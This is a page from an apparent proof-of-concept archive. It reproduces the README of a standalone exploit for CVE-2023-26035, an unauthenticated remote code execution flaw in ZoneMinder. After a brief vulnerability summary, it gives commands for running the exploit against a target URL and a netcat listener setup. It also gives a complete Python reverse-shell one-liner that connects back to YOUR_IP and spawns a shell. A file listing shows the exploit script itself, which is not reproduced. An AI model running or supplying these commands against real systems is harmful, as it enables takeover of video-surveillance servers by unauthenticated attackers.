关联漏洞
标题:ZoneMinder 安全漏洞 (CVE-2023-26035)Description:ZoneMinder是一套开源的视频监控软件系统。该系统支持IP、USB和模拟摄像机等。 ZoneMinder 1.36.33之前版本和1.37.33之前版本存在安全漏洞,该漏洞源于存在通过缺失授权进行未经认证的远程代码执行的漏洞。
Description
Exploit for CVE-2023-26035 affecting ZoneMinder < 1.36.33 and < 1.37.33
介绍
# Exploit - ZoneMinder CVE-2023-26035
There is a **Unauthenticated Remote Code Execution (RCE)** affecting **ZoneMinder** Snapshots.
This is an **exploit** for CVE-2023-26035.
## Affected versions
ZoneMinder **< 1.36.33** and
ZoneMinder **< 1.37.33**.
## Usage
#### Check if the target is vulnerable:
python3 zoneminder.py http://target
#### Execute a command
python3 zoneminder.py http://target command
## Examples
#### Test command execution with `ping`
Run `tcpdump` on the interface connected to the target (here `tun0`) and filter for `ICMP` packets:
sudo tcpdump -i tun0 icmp
Then execute a ping to your IP. Make sure to use quotes `"` as otherwise the command won't be interpreted correctly.
python3 zoneminder.py http://target "ping -C 4 your_ip"
#### Reverse shell
Create the listener with netcat:
nc -lvnp 1337
Use a reverse shell oneliner:
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"
More at https://revshells.com.
## Requirements
The exploit make use of **`requests`** and **`BeautifulSoup`**.
Install it with :
python3 -m pip install requests beautifulsoup4
## Acknowledgements
I just wanted a standalone exploit that didn't require Metasploit.
The script is derived of https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr
文件快照
[4.0K] /data/pocs/c4789e4428047af177d42aebddd1196f627873b3
├── [ 77K] demo.png
├── [1.6K] README.md
└── [3.3K] zoneminder.py
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。